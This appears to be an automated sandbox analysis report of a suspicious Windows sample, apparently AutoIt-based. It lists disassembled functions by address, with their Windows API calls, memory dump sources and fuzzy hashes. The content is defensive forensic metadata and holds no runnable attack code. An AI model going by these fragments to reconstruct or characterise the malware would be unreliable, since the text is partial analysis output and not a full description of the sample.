                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fbc0e56a416862b311fa508754cd2c6e23ecdbea761e39e70a08c465f6ba63ce
                                                      • Instruction ID: 7825cdfe19e53f1cd47ae843f9df86daebf48cc0d20e88624ff325d123baf437
                                                      • Opcode Fuzzy Hash: fbc0e56a416862b311fa508754cd2c6e23ecdbea761e39e70a08c465f6ba63ce
                                                      • Instruction Fuzzy Hash: B2517F35A00604AFCF14EB64CE95FAE77B6AF45750F18C168F90AAB292CB34ED05CB51
                                                      Function 00A65C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00A65CF6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 9693e31ca31f205431f6b03bde6444d1c85a0c1bb6bce2ec9256091d1ef3a153
                                                      • Instruction ID: b04f39d4a617d984c3d23d294843aeda9b357a0b0bb89ac402d4fb929489269b
                                                      • Opcode Fuzzy Hash: 9693e31ca31f205431f6b03bde6444d1c85a0c1bb6bce2ec9256091d1ef3a153
                                                      • Instruction Fuzzy Hash: 66313A71A00B0AEFCB18DF6DC884A6DB7B5FF48310F248629E81993750D771A960DB90
                                                      Function 00AA00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: c8c2e6bbeafc101452922d73cb5156ab4972e59967e2d0b556e9f4e52f7dc423
                                                      • Instruction ID: 2a4112e25d26ad852e72cb3439fa04100bf9032e44cf6b970660462af5b7e721
                                                      • Opcode Fuzzy Hash: c8c2e6bbeafc101452922d73cb5156ab4972e59967e2d0b556e9f4e52f7dc423
                                                      • Instruction Fuzzy Hash: 2941D474504351CFDB24DF14C984B1ABBF0BF55318F1989ACE8999B762C732E886CB52
                                                      Function 00A65B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: cc9c2962c8420d467e190322b828d6d48df0691e42887a61e7c974b902f383b4
                                                      • Instruction ID: f3ea130a90bc4fc9d0aaf24ad8293e153c3537c65dc52406f2b79a5dd73eccf8
                                                      • Opcode Fuzzy Hash: cc9c2962c8420d467e190322b828d6d48df0691e42887a61e7c974b902f383b4
                                                      • Instruction Fuzzy Hash: 0D21AE30A10A08EBDF10DF65E885AAA7FF8FF10350F21856AE485C2012EF7194A08B55
                                                      Function 00A6C707 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp
                                                      • String ID:
                                                      • API String ID: 856254489-0
                                                      • Opcode ID: 9405ef9360b7a51ac207f998aea279379797b4187b3ca3c2abdc2c8fea765dc7
                                                      • Instruction ID: b1c45e7a07dc62aecd4c9997451cf8c276f2194722c2b4306f4033bfd9d56a4b
                                                      • Opcode Fuzzy Hash: 9405ef9360b7a51ac207f998aea279379797b4187b3ca3c2abdc2c8fea765dc7
                                                      • Instruction Fuzzy Hash: 6E117272904129EBCF14EBA9DD919EEF778EF55360F108126E851A71D0EB309E05CB90
                                                      Function 00A64F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A64D13: FreeLibrary.KERNEL32(00000000,?), ref: 00A64D4D
                                                        • Part of subcall function 00A8548B: __wfsopen.LIBCMT ref: 00A85496
                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00B262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A64F6F
                                                        • Part of subcall function 00A64CC8: FreeLibrary.KERNEL32(00000000), ref: 00A64D02
                                                        • Part of subcall function 00A64DD0: _memmove.LIBCMT ref: 00A64E1A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                      • String ID:
                                                      • API String ID: 1396898556-0
                                                      • Opcode ID: bbc28cb79dd9747d3a1e68b5db50e289e9d59290a28e3f1fa77e925d7dda062b
                                                      • Instruction ID: 88b344aa5a8509c1e18df31d195e624a3425393f66a971bdfdc4e40ef0a3f607
                                                      • Opcode Fuzzy Hash: bbc28cb79dd9747d3a1e68b5db50e289e9d59290a28e3f1fa77e925d7dda062b
                                                      • Instruction Fuzzy Hash: 7611C131A00709EECB14AF70C902FAE77B9DF48B00F118429F941AA2C1DA719A559BA0
                                                      Function 00AA01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: f1a23b546a534a8f6b056cba7a2fbad72957b75b2b8f1e67ae9a45e6e5d53c98
                                                      • Instruction ID: 739947d31fac50f328d5cbc18b6add1a04d686c920cf3a384b91aba961d60523
                                                      • Opcode Fuzzy Hash: f1a23b546a534a8f6b056cba7a2fbad72957b75b2b8f1e67ae9a45e6e5d53c98
                                                      • Instruction Fuzzy Hash: DA210FB4508351CFCB24DF54C884A1ABBF4BF89714F048968E89A5B761D732E849CF52
                                                      Function 00A65D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00A65807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00A65D76
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 5a4caf6bff90bfa58026d521faf872804f218582274bc7df1a4813948ba13e92
                                                      • Instruction ID: 2765e7f716ff0ec49a52a7cde6fe11c4155e538434d12a8ad6a9ed247efe775c
                                                      • Opcode Fuzzy Hash: 5a4caf6bff90bfa58026d521faf872804f218582274bc7df1a4813948ba13e92
                                                      • Instruction Fuzzy Hash: CE110631600B05DFD730CF25C888B66B7F9EF45760F14C92EE5AA8AA90D7B1E945CB60
                                                      Function 00A6C6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp
                                                      • String ID:
                                                      • API String ID: 856254489-0
                                                      • Opcode ID: 5a7d7a3af063aa8dff0968238defc7fb39dd86b7b2dde550ccc449ee86ca5d26
                                                      • Instruction ID: 9ed38578e66f76a75cb06962bd366e3159de3bb29d7faa65ee133684c45fee31
                                                      • Opcode Fuzzy Hash: 5a7d7a3af063aa8dff0968238defc7fb39dd86b7b2dde550ccc449ee86ca5d26
                                                      • Instruction Fuzzy Hash: 0001F972D082555FDB169B2888516AEFF749F57320F19809BD890EB1A1D2309D42CF91
                                                      Function 00A65BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
                                                      • Instruction ID: 84c79580d006aae36979cd62e1561e365aa9ad146f94cfd9d4cbda7b5f55772c
                                                      • Opcode Fuzzy Hash: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
                                                      • Instruction Fuzzy Hash: 0E018475600541AFC305EB69C941D26F7B9FF953507148159F815C7702DB30EC21CBE0
                                                      Function 00A84A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __lock_file.LIBCMT ref: 00A84AD6
                                                        • Part of subcall function 00A88D68: __getptd_noexit.LIBCMT ref: 00A88D68
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __getptd_noexit__lock_file
                                                      • String ID:
                                                      • API String ID: 2597487223-0
                                                      • Opcode ID: dda4bf41ada0723c3bcfa7672f0f2842e928ec04d02bec33fc134e2bc2c03b6b
                                                      • Instruction ID: 691f58f958fddc53f915052c1c46c1667e433186a6dec80e073be64a2671f56d
                                                      • Opcode Fuzzy Hash: dda4bf41ada0723c3bcfa7672f0f2842e928ec04d02bec33fc134e2bc2c03b6b
                                                      • Instruction Fuzzy Hash: 5BF0AF3194020AABDF61BF648D0679FBAA1AF04365F448514F424AA1D1DF788A50DF51
                                                      Function 00A64FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,00B262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A64FDE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: a4784345c165452e4a505fbaa03559ee1a429afa5794ef9022bf6371c8f4985a
                                                      • Instruction ID: 3c023aa2b8ff35e5cafa666302d33b68f78003d374bce78e73cad7d378ec0680
                                                      • Opcode Fuzzy Hash: a4784345c165452e4a505fbaa03559ee1a429afa5794ef9022bf6371c8f4985a
                                                      • Instruction Fuzzy Hash: 30F03971509B12CFCB349F64E494812BBF1BF087293208A7EE5D682610C771A840DF40
                                                      Function 00A809D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A809F4
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath_memmove
                                                      • String ID:
                                                      • API String ID: 2514874351-0
                                                      • Opcode ID: 34cfa31e5b087328c7609371c923ea353baeec0f54e6b17b2e65c4e01c59f6ec
                                                      • Instruction ID: 68576f0facb7d84992ce30ef2e94093017dc8270a36c1935b12c247a63f3afb6
                                                      • Opcode Fuzzy Hash: 34cfa31e5b087328c7609371c923ea353baeec0f54e6b17b2e65c4e01c59f6ec
                                                      • Instruction Fuzzy Hash: 68E0CD36A042285BC720D6989C05FFA77EDDF88790F0401B5FD0CD7204E9609C818690
                                                      Function 00AC9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID:
                                                      • API String ID: 2638373210-0
                                                      • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                      • Instruction ID: aaf15684a50c6e00bf82a2d8cf98bc277051f8f37ffd3589358b1fb403f67f83
                                                      • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                      • Instruction Fuzzy Hash: 3DE09AB0604B009FEB788B28D815BE373E0BB06315F04091DF6EA83342EB62B8418B59
                                                      Function 00A65DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00A9E16B,?,?,00000000), ref: 00A65DBF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: d071b5b169c1ca475ff7796f2bccb4c33ac213cbe6341001d2dd0404d5a7fbd8
                                                      • Instruction ID: 824b45cbb4fdab9f6964fc40ec031bcea8c063255bb62e49b862ad4756f100f9
                                                      • Opcode Fuzzy Hash: d071b5b169c1ca475ff7796f2bccb4c33ac213cbe6341001d2dd0404d5a7fbd8
                                                      • Instruction Fuzzy Hash: 58D0C77464020CBFE710DB80DC46FA9777CD745711F100294FE0456290D6B27E508795
                                                      Function 00A8548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __wfsopen
                                                      • String ID:
                                                      • API String ID: 197181222-0
                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction ID: 73f6149758e80a5c198c126929bcdafc58b6a96266978ae9aadcbc9b4e4cb857
                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction Fuzzy Hash: 2CB0927684020C77DF022E92EC02A593B1A9B40678F808020FF0C18162A673E6A09689
                                                      Function 00ACD2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00ACD46A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      • Opcode ID: 0642d94ba85e5d6c8f8d0b5401ff3e6d0ee52b91ad32828f855e11f5814f9ba2
                                                      • Instruction ID: a8da8e7ddf9666cfaabba524f40a1668b7b71a0a075c90bd0ca5fc16f3468ebf
                                                      • Opcode Fuzzy Hash: 0642d94ba85e5d6c8f8d0b5401ff3e6d0ee52b91ad32828f855e11f5814f9ba2
                                                      • Instruction Fuzzy Hash: BB716D306083018FC714EF64C691F6AB7F4AF98354F05496DF9969B2A2DB30ED49CB52
                                                      Function 00A80E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: 1d5be5228eec2586ba2f7d8b2e3181c96596543a95ff1134eb710642871b818b
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: 7131C471A00105DFC7A8EF58D48096AF7B6FF59300B648AA5E409CB651D731EDC5CBC0
                                                      Function 03D82300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 03D82311
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
